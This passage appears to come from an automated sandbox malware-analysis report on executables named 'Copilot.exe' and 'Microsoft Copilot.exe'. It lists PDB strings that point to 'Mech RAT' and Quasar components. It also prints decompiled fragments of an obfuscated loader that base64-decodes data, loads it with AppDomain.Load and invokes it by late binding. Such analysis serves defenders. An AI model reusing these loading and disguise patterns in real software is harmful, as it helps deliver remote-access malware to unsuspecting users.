                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdbSHA256 source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdb source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdbe+ source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\MSTest.Core\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.dll.4.dr
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdb source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: cil.Pdb.j source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdb source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll0] source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cil.Pdb. source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdbl source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: BouncyCastle.Crypto.pdb source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: .pdb;Pdb file found for path '{0}' source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr

                    Data Obfuscation

                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.QXqheBYBDWmdO5ql2x6ldCHTvjDXHBVXLPOJUhWFGNDrLowZjRvTjGw,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.cR5q1TtwLue4QvaAhV1iKHyksopJYzGaomDuk6SzeHty3O3ErUQuXXa,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.iNCiWddRgJ1hoc1d6PshlCL2N1HMp7hK72B14lbH7VgPAkbnpQSSOnD,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.EW1OxE6tQp1VXmI1hNg2s8B1w2GTpYd7nBOus30FbmyVyq0LdpGRlbt,B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.YoDGckt8ud8LlAgWo4LL6xeCEtF3R9MbeNvXcVx3dsfBEz1lDFEGQjzcQp5qQDpKJljz4B4D2wMOarIK4utWq2l()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2],B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.m0rpAWerNinOiH6Bx9UnxG4vuQsLTg7lNYDDgnKWqNv0c4U9cM3WV9baKJdCRVK3Cijee7O0P(Convert.FromBase64String(SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.QXqheBYBDWmdO5ql2x6ldCHTvjDXHBVXLPOJUhWFGNDrLowZjRvTjGw,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.cR5q1TtwLue4QvaAhV1iKHyksopJYzGaomDuk6SzeHty3O3ErUQuXXa,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.iNCiWddRgJ1hoc1d6PshlCL2N1HMp7hK72B14lbH7VgPAkbnpQSSOnD,XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.EW1OxE6tQp1VXmI1hNg2s8B1w2GTpYd7nBOus30FbmyVyq0LdpGRlbt,B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.YoDGckt8ud8LlAgWo4LL6xeCEtF3R9MbeNvXcVx3dsfBEz1lDFEGQjzcQp5qQDpKJljz4B4D2wMOarIK4utWq2l()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2],B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.m0rpAWerNinOiH6Bx9UnxG4vuQsLTg7lNYDDgnKWqNv0c4U9cM3WV9baKJdCRVK3Cijee7O0P(Convert.FromBase64String(SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SOqEAoO1spd2jFbTHwef5qnZZeSVbW68UxmO7TCKmjWbaYLrDSNQ3v3[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs | .Net Code: NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk System.AppDomain.Load(byte[])
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs | .Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH System.AppDomain.Load(byte[])
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs | .Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs | .Net Code: NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk System.AppDomain.Load(byte[])
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs | .Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH System.AppDomain.Load(byte[])
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.cs | .Net Code: biTyN82QxV5xbgpkHW1cPoyVK0nD8q7L499HMiuf01EQPDbrfVXfdDH
                    Source: Mono.Cecil.Rocks.dll.4.dr | Static PE information: 0xA5EFDE46 [Thu Mar 21 18:24:06 2058 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Code function: 1_2_00007FFAACB3105D push ebx; retf 1_2_00007FFAACB3106A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFAACA0D2A5 pushad ; iretd 12_2_00007FFAACA0D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFAACBF2316 push 8B485F94h; iretd 12_2_00007FFAACBF231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAACA2D2A5 pushad ; iretd 16_2_00007FFAACA2D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAACC12316 push 8B485F92h; iretd 16_2_00007FFAACC1231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAACC16A29 pushad ; iretd 16_2_00007FFAACC16A2A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFAACA1D2A5 pushad ; iretd 19_2_00007FFAACA1D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFAACC02316 push 8B485F93h; iretd 19_2_00007FFAACC0231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFAACA0D2A5 pushad ; iretd 21_2_00007FFAACA0D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFAACBF2316 push 8B485F94h; iretd 21_2_00007FFAACBF231B
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 28_2_00007FFAACB500BD pushad ; iretd 28_2_00007FFAACB500C1
                    Source: Quasar.resources.dll.4.dr | Static PE information: section name: .text entropy: 7.523596358740439
                    Source: Copilot.exe.0.dr, JROk0Eci9ENTX2os2noz7QF7om05s1eNs5Pju7pQ4InncB1gXtsCZxgYXaMKF9CalozBMWsRf.csHigh entropy of concatenated method names: 'zzz9kNPiyb347OFJGtsSWd91D8yHTr0DcPDJZuaqGMh9G7wR3ZcZ2mXzj1ovIv5lpJAhjq8Hf', 'w28s5Ov9OqqYWDPyFXgFqg63ybAsYSPVhX1dFiF4pFKh1638a5bkOXhLHduJqgR44opjpE3vi', '_8YhhV8wVsqXuGAtE2GSEM7Sj3Pv1a9NlKzRwyKgLX7pReNlBatJ5Q05paqiBHAubmwuBEWgms', 'v3HOUB0vSVfwYOs', 'kqVaN5oO22jKzuw', 'KTsJUDejD4ay42w', '_07RDr7CEnBMJyFR', '_1MFbc5OhNAEZonG', 'P9D8iU9QmyAimll', 'SQkSF9ifG7BfWqM'
                    Source: Copilot.exe.0.dr, XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.csHigh entropy of concatenated method names: 'e7gShrsOowb6OBBMuQbZjGo7NiUdJQdWs7ewdeuFfxmj0O1Qq7xIsR8V0szDKqHfZnYtxyLOk', 'i1VhreKaGWaODWzwCS9IJTaJBXnSvTblkQFdctlfezJoJUY0YWyKI7vtqOczGqiG62YgXBmX3', 'FCpqa1ykUc4HCbajI5zt9f44tjtHnmcjyts6XIFfvTdCw73XstgFzu7UAvcyCC5lNleMw24Ic', 'sZoLdrIe8ju684guo2SmBLwV8i0EyDA6FkKvqBFsUN7BgRNoaUbmjyESxiJuIv69zBGoXI3Hb'
                    Source: Copilot.exe.0.dr, 5OJs19f2uhPfUVeDxLPXHar.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_54vQtaO2du4tmlhYiHsboNIAmKcIDKrwtsicsnyx5TM8XH44VKWhlt226YiJtux1LzuslUzO6', 'xY3jqEnq9kzaWTDJ2c067h0ySl9VKemkcn5DYPaXpaApus8XZn5qAyIBI4jabpSTuOAPlXh4x', '_3w8f2ytK17lQsk8bOZ3KmloYRGbY6ndDPS9ishJeMY57MSHdnowmdrCxZTgghZN8YYHKJKWx7', 'aRTy8dvPWCTwlNEmETpNBCejoJtVaga0BmXLdkXNvw5tUpRCEF4msvSkAlvjcCiRtTLLf4lgJ'
                    Source: Copilot.exe.0.dr, 5fllQ7pqCcfYdIoqhx96LhArCojSoN2cBZDL1sFXjz7YVNsfr6AQfHO.csHigh entropy of concatenated method names: 'GDXchcMtGDkY1Vou9LYvAwf14iS5MdkdpbYOeczPReY8DRo4whLLs4y', 'EYJGL5lDkwuMliNjoq1drYzBaEX6rBXK2AKkp1mKAHboqJEoRIa4ld5', '_61ox06DpfX2PtLLtLZzpiT9L7GUWRrZLjFXndBbotM9sdgtutjYGRSg', '_4AwNxYSdSHwFOJMbp9fy4pR9YV13ciXZ76LFLH7AIHejgj2H2OEJAEj', 'VdHhYqYEYuzQvBx4H2YKkXnCMrhi2SX8Jc1S6QLyMRjCULAqucmJK7l', '_0Q57a8G3DXcwQfFS8pyBEfRDXGzjtG3LKO1hHqFvI1iPDG6AmToNpFJ', '_7lalOXRRoj63ahdWX3HMjGmtgwxBxYVhCygMId9KeaadrHjqjEO47Tv', 'l1nBJcwnAVgjhfQsEq3MZY8KqYmowdcWxtNiCs1zkIJ8sGXDuPjIcFI', 'vN6EVCZnq0d4fHLuBG2ejJ9ZgAgLRHyN2zwTQoc4YFhbCG0zuMpQpmm', '_4Vfu30y4aMEocc6AvnJMiwhbA8gAx2wkvftBh9hihRSNdGz7pSkchEF'
                    Source: Copilot.exe.0.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.csHigh entropy of concatenated method names: 'Y2DzlIIVnJSnFRdxYcpmN2ErHj5Ro34Q954TsQwyda699iagsRoKgcw', 'NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk', 'VJT1HOu7wvydw6VkH0CCNuFbH6L7K8pX0mGF0frZocx11ArWTiToztd', 'EkSCZMVSQnV6DlScrtHGpsvzngeX6YP6blSBEwpkoj8trokbaSU9O3h', 'QNfHtEVuQ2ymP7yzBI4G7ISPtk1vO5fsfzZ82PmDWhlvPFKUiC0ooQj', 'JM65JA1sXick4wXH48WgQlX9Xy8cDCO5Kezo3r9i71jK9BvB3yZ3TuH', 'SSuecDAkyQnK8PFW383yc3vHl9I9HgBMVxikYudDcV0aOWEWSZZdn1O', 'zpIAK1K0RwzI9fu6ymxXTfFi3X5U5e2tgEWXq32bWGIrHso89fFraAI', 'kswgLpNWEa3rrMjudOXStJTf51pJCbLs29f6tVgpPb8ovOzUOm86BE6', '_0pgx9BtiL5nLEsgywMnjeOuDJb6kgzcIFFOq8fZRSSsGcW2EFahEORW'
                    Source: Copilot.exe.0.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csHigh entropy of concatenated method names: 'Rh8IOcOZivZ3DrlDLmNIwCsyYHXpIeYkJhJO1QVhNY3tBqg35b7x34B', 'AfdAljf2buztXsx1XiGKdNAkJrgVMTtp4EMR7uAICpcT7nqCTgca8Q8', 'P9V1Ih5rsAV6a1nikxPqNtY9N6jkVXkxW2lPdGgMUdo9lhZRTY7mv1e', 'X25xugaawcC4cTH5I1fWPQz6gzGAMTTZlljlbLrfJcK3v5xG43QKyAj', 'vCV9er41lqc62F3nmnXBywE6aS6SzVQsNadyDnd255XSX4mKLXMaZbQ', '_5vnlwydEsVRKyeSdp46qUI0eDqNoN7NhUxiDX3PqrbSpcLlMwpabjbs', 'GNwINVOMISs71IP8DwssQ1lzeFEWC0LgvzZW4pJVXY085y5qgifsg4g', 'CYfCJqeUrdpt3RyziTjTuvaSiYtTfg85SteeWEhugvkzM6Xsi0PFoB6', 'RQlnXojfaB4AsdGp9fzX0ndZXQBPQqzLVIUn2E9c9c07G9oB3bgcutU', 'pEFfV4LXwLhAXpxsm8ir9L6nGZMyVsn6bBI20ZoBv6xjA1f7iRdtLnF'
                    Source: Copilot.exe.0.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csHigh entropy of concatenated method names: 'wd76gDubxesDbDajQMUcaXkr9pTksJZPBeuflwgSj1MDa2IQvyGjDdSv9ADZ9B6CweGvSTGSShuu5dM4QBeWG9I', 'fNgi7pPBcbsQy9237UndotP16XTPTisnfZZg8aORcJcVHgGDn3t2tW0NOXUa7UXoaHcBEpllHsp7kTiQldFbkJ7', '_7Eq7iOmpU53TTL8OHOAqqdBQz0o3ZyZ3waB5TJ00Uwgl2rc0DeB567MejLOKt9RKQOZnRy7WQ9dDLkrc7kn9Yi9', '_56N8isy8FI1GuJBl0z4C97Exkx9DmPTVhg08FgBnwD2UwJbcT7SIERrN04Ay9U8ARzDTgLxkvHNmDbQF0rCZTGM', '_5rDOO4kboCqyZPyzA2OaLmSQ3MR3CPrXR8kf87WFNwYW1IwjTSowvn26IhLEWcE9buxmmXZqQTVhySOcv1B7qr0', 'MsXc94LEFTYocjklQThny61epluqEyxDUubulPuO0jqRBLShKfjA07v3t6tOfFdmr1MyE3Dx9IhhIiJknVhUQqi', 'RXscBl8tsb4J5B3Hg3HuxHnUrbAItIsyvMVhufxjaU3xmx27h7rA5jB2azQBHcPnq6oXkQWD16BD7wLJyROp5jY', 'iegOmGxTPr28aBjTs1Bpt3gyCSgOA4ldBKs7MHbHTO59fBv6Bk2AgdwazLH2SdZfvgmu3ESMfXjVxFaaiaIP6rJ', '_9SJCwAwqP1bNJ1lxmTucjMgUJ3uVv0E3ADEgYVmlr3OYlPEH5JwxrK44d4eE3Be8DlbiVFOYB2WjaV9KRFiYlGD', '_5dLEcawLxZeFVKZjgpN3wzdhbKaPtDhQOFKyHjPR9MIFsyMgVpijXc15Wr8KIJUPqhdIITTsfWDOeicEZlxZK9o'
                    Source: Copilot.exe.0.dr, lN9yj0DclvLFRThUfMYKKmx2hzrhxQ13n5kxy2uTP7z60LyMXNHr5aH2jqOLeRa4Pi9le3w24R6tmLaZf8rxnyC.csHigh entropy of concatenated method names: 'asG8aK4379S4LVCWeww50ZK1vccCwVCRHCQgD4Ttkcesi7hM1iBGOi0w6QJhyvNQTnOKDpqVArBx7i0J7VfZagn', 'RBotrOTrFq2SH6MOLHscsFYm1gIiFwiw49RstOzq9T2M5c8XngG9XGaDNlMOYiCh9YF8wPXEieU6ro9JXJoZGGd', 'LLvNWppYJwppCewCURVUIOv256OxJFlObOUrrbVbxQ9Jzk9Ud2Dn6sktBMc60ueRNkvbqrgZpCyznX9WES6LIDB', '_1D8H93VJcm5uLul3rV4GmDH5kBITjCt1W72fXJCWAx2mtqvEnbz2GMHGEXmUANIRcamcCVxw9bDxnN5Hn46jKWI', 'GJQCgPL0mJRNm3M', '_4MZQxFDozqVQOs0', 'dFghmN08kbr7QtI', 'wgsKqYmdAb5ZZQI', 't8GUAUDDrhNkhmv', '_2rtGFiKXxe6wvJV'
                    Source: Copilot.exe.0.dr, 08I4HlpfZvcXgQJn6jhwLOiX5NhqxmSDMQTziisZ5tgE8NeYxznxnl0.csHigh entropy of concatenated method names: 'rkhiNPWgaENIbdkCp6mJtdOPN3mFbpQMuPwvi8kf4rGCc2X72CpsDNt', '_59bJb29T3A9eh4GP7lPhvEZDx5CXQKRkNqgJsPN3vWk8rPr3YsWN6q1FQAdkmo7JVizqwY4Bc0hhMF873KwYNxE', '_8SpLtqtxL11qXpFPX0EYNetLlM7tGh5fkVJXBWlIBPqVCCMlqqoEtdyIYiSROIRSFJUCYVze3U7GOgybQJ1GZ4B', '_3tN4sqb7XBF96eyGZbHxv1TWxurThY4vI02UIVrImdNI7ZZ3yxAw34w8MHNp44J9sS1m4qNtxWtJc6cGBgvt2ym', 'UQBh4otD5J4nlDsaVWOkC8ul68K27zQk7FVjcst0hAxOyvXHJZp1hgwAhyK8oAigDYhN5Oc9gu453aovpq1m3EQ', 'lBAkOyFN4esJnd6690p9qvYki7ULS5jkmRPFPFIvZmlkhOv8jdfX7MiLJ4mM2T8AZutZSoxVZ2GtseegPiFKjHL', 'VRPg9HqyC1arRrsr8BoK5OUv9X8pjpUTh10SPJW4GIotpLazNtgLvv04K5DmXcqBXsNNIEcxbeu9H9ZtQzd1hcm', 'ha4EUhVu1mLLH2coeWSfQZrhSfxZJDXOgv2uauPZ6fPKI8yxvygvQVk3CvudwZqQ3Wg3j4guhUTHn1zs5k0Zm9R', 'MwHHezqwVMSNQjjljHaBml7A5yY2DrmHdQCYBX3eVMwOucmz2b2z4FzLzRNtREPUp3VezMRw9HXbwmuBye73QsF', 'RWB6kPdfXI6U1deoBZhLKOdv6VCsya4A9FnQidDywAh6d3DP70QkSqvixLFsG9Yrhns4n3ni5x4aKFRew2wA1Yq'
                    Source: Copilot.exe.0.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.csHigh entropy of concatenated method names: 'bJcJPCY3g4GZB37VXKjWdykXzvKaVcspg6h2Tky5txjBt3vo0IpVM4fOzFGUuvQU0wOVdHT3roVP9VhbXJ8GP5W', 'qbixFGD30WX2pBs', 'YdqRMxdvksPO6bu', 'vafmKXXYFmdgUGo', '_32tQUhdDBDxEIwM'
                    Source: Microsoft Copilot.exe.1.dr, JROk0Eci9ENTX2os2noz7QF7om05s1eNs5Pju7pQ4InncB1gXtsCZxgYXaMKF9CalozBMWsRf.csHigh entropy of concatenated method names: 'zzz9kNPiyb347OFJGtsSWd91D8yHTr0DcPDJZuaqGMh9G7wR3ZcZ2mXzj1ovIv5lpJAhjq8Hf', 'w28s5Ov9OqqYWDPyFXgFqg63ybAsYSPVhX1dFiF4pFKh1638a5bkOXhLHduJqgR44opjpE3vi', '_8YhhV8wVsqXuGAtE2GSEM7Sj3Pv1a9NlKzRwyKgLX7pReNlBatJ5Q05paqiBHAubmwuBEWgms', 'v3HOUB0vSVfwYOs', 'kqVaN5oO22jKzuw', 'KTsJUDejD4ay42w', '_07RDr7CEnBMJyFR', '_1MFbc5OhNAEZonG', 'P9D8iU9QmyAimll', 'SQkSF9ifG7BfWqM'
                    Source: Microsoft Copilot.exe.1.dr, XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.csHigh entropy of concatenated method names: 'e7gShrsOowb6OBBMuQbZjGo7NiUdJQdWs7ewdeuFfxmj0O1Qq7xIsR8V0szDKqHfZnYtxyLOk', 'i1VhreKaGWaODWzwCS9IJTaJBXnSvTblkQFdctlfezJoJUY0YWyKI7vtqOczGqiG62YgXBmX3', 'FCpqa1ykUc4HCbajI5zt9f44tjtHnmcjyts6XIFfvTdCw73XstgFzu7UAvcyCC5lNleMw24Ic', 'sZoLdrIe8ju684guo2SmBLwV8i0EyDA6FkKvqBFsUN7BgRNoaUbmjyESxiJuIv69zBGoXI3Hb'
                    Source: Microsoft Copilot.exe.1.dr, 5OJs19f2uhPfUVeDxLPXHar.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_54vQtaO2du4tmlhYiHsboNIAmKcIDKrwtsicsnyx5TM8XH44VKWhlt226YiJtux1LzuslUzO6', 'xY3jqEnq9kzaWTDJ2c067h0ySl9VKemkcn5DYPaXpaApus8XZn5qAyIBI4jabpSTuOAPlXh4x', '_3w8f2ytK17lQsk8bOZ3KmloYRGbY6ndDPS9ishJeMY57MSHdnowmdrCxZTgghZN8YYHKJKWx7', 'aRTy8dvPWCTwlNEmETpNBCejoJtVaga0BmXLdkXNvw5tUpRCEF4msvSkAlvjcCiRtTLLf4lgJ'
                    Source: Microsoft Copilot.exe.1.dr, 5fllQ7pqCcfYdIoqhx96LhArCojSoN2cBZDL1sFXjz7YVNsfr6AQfHO.csHigh entropy of concatenated method names: 'GDXchcMtGDkY1Vou9LYvAwf14iS5MdkdpbYOeczPReY8DRo4whLLs4y', 'EYJGL5lDkwuMliNjoq1drYzBaEX6rBXK2AKkp1mKAHboqJEoRIa4ld5', '_61ox06DpfX2PtLLtLZzpiT9L7GUWRrZLjFXndBbotM9sdgtutjYGRSg', '_4AwNxYSdSHwFOJMbp9fy4pR9YV13ciXZ76LFLH7AIHejgj2H2OEJAEj', 'VdHhYqYEYuzQvBx4H2YKkXnCMrhi2SX8Jc1S6QLyMRjCULAqucmJK7l', '_0Q57a8G3DXcwQfFS8pyBEfRDXGzjtG3LKO1hHqFvI1iPDG6AmToNpFJ', '_7lalOXRRoj63ahdWX3HMjGmtgwxBxYVhCygMId9KeaadrHjqjEO47Tv', 'l1nBJcwnAVgjhfQsEq3MZY8KqYmowdcWxtNiCs1zkIJ8sGXDuPjIcFI', 'vN6EVCZnq0d4fHLuBG2ejJ9ZgAgLRHyN2zwTQoc4YFhbCG0zuMpQpmm', '_4Vfu30y4aMEocc6AvnJMiwhbA8gAx2wkvftBh9hihRSNdGz7pSkchEF'
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.csHigh entropy of concatenated method names: 'Y2DzlIIVnJSnFRdxYcpmN2ErHj5Ro34Q954TsQwyda699iagsRoKgcw', 'NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk', 'VJT1HOu7wvydw6VkH0CCNuFbH6L7K8pX0mGF0frZocx11ArWTiToztd', 'EkSCZMVSQnV6DlScrtHGpsvzngeX6YP6blSBEwpkoj8trokbaSU9O3h', 'QNfHtEVuQ2ymP7yzBI4G7ISPtk1vO5fsfzZ82PmDWhlvPFKUiC0ooQj', 'JM65JA1sXick4wXH48WgQlX9Xy8cDCO5Kezo3r9i71jK9BvB3yZ3TuH', 'SSuecDAkyQnK8PFW383yc3vHl9I9HgBMVxikYudDcV0aOWEWSZZdn1O', 'zpIAK1K0RwzI9fu6ymxXTfFi3X5U5e2tgEWXq32bWGIrHso89fFraAI', 'kswgLpNWEa3rrMjudOXStJTf51pJCbLs29f6tVgpPb8ovOzUOm86BE6', '_0pgx9BtiL5nLEsgywMnjeOuDJb6kgzcIFFOq8fZRSSsGcW2EFahEORW'
                    Source: Microsoft Copilot.exe.1.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csHigh entropy of concatenated method names: 'Rh8IOcOZivZ3DrlDLmNIwCsyYHXpIeYkJhJO1QVhNY3tBqg35b7x34B', 'AfdAljf2buztXsx1XiGKdNAkJrgVMTtp4EMR7uAICpcT7nqCTgca8Q8', 'P9V1Ih5rsAV6a1nikxPqNtY9N6jkVXkxW2lPdGgMUdo9lhZRTY7mv1e', 'X25xugaawcC4cTH5I1fWPQz6gzGAMTTZlljlbLrfJcK3v5xG43QKyAj', 'vCV9er41lqc62F3nmnXBywE6aS6SzVQsNadyDnd255XSX4mKLXMaZbQ', '_5vnlwydEsVRKyeSdp46qUI0eDqNoN7NhUxiDX3PqrbSpcLlMwpabjbs', 'GNwINVOMISs71IP8DwssQ1lzeFEWC0LgvzZW4pJVXY085y5qgifsg4g', 'CYfCJqeUrdpt3RyziTjTuvaSiYtTfg85SteeWEhugvkzM6Xsi0PFoB6', 'RQlnXojfaB4AsdGp9fzX0ndZXQBPQqzLVIUn2E9c9c07G9oB3bgcutU', 'pEFfV4LXwLhAXpxsm8ir9L6nGZMyVsn6bBI20ZoBv6xjA1f7iRdtLnF'
